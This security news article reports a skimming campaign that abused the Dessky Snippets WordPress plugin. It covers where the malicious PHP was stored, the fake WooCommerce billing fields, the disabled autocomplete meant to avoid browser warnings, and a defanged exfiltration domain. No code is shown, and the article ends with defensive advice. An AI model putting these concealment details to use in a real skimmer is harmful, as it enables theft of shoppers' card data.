A new cyberattack is exploiting the WordPress Code Snippets plugin to insert malicious PHP code into victim websites, collecting credit card data. This activity was observed by Sucuri on May 11, 2024, and involves abusing a WordPress plugin called Dessky Snippets, which allows users to add custom PHP code. The plugin has over 200 active installations.
Attackers exploit known flaws or easily guessed credentials in WordPress plugins to gain administrator access, then install additional plugins (legitimate or malicious) for further exploitation. Sucuri reported that the Dessky Snippets plugin is being used to insert server-side PHP credit card skimming malware on infected websites, stealing financial data.
Security researcher Ben Martin noted that the malicious code is stored in the dnsp_settings option within the WordPress wp_options table. It manipulates the billing form and injects its own code to modify the checkout process in WooCommerce. Specifically, the malicious code adds several new fields to the billing form, requesting credit card details, including name, address, credit card number, expiration date, and CVV number, and leaks this information to the URL “hxxps://2of[.]cc/wp-content/”.
Notably, the billing form associated with the fake overlay has its autocomplete attribute disabled (i.e., autocomplete="off"). Martin explained that by manually disabling this feature, attackers reduce the chances of the browser warning users about entering sensitive information and ensure that the fields remain blank until the user manually fills them in, reducing suspicion and making the fields appear as routine, necessary inputs.
This is not the first time threat actors have abused legitimate code snippets plugins. Last month, Sucuri disclosed attacks abusing the WPCode code snippets plugin to inject malicious JavaScript code into WordPress websites, redirecting site visitors to the VexTrio domain. Another malicious campaign, dubbed Sign1, infected over 39,000 WordPress websites in the past six months by injecting malicious JavaScript using the Simple Custom CSS and JS plugin, redirecting users to scam sites.
WordPress site owners, especially those offering e-commerce functionality, are advised to keep their sites and plugins up to date, use strong passwords to prevent brute-force attacks, and regularly audit their sites for signs of malware or unauthorized changes.
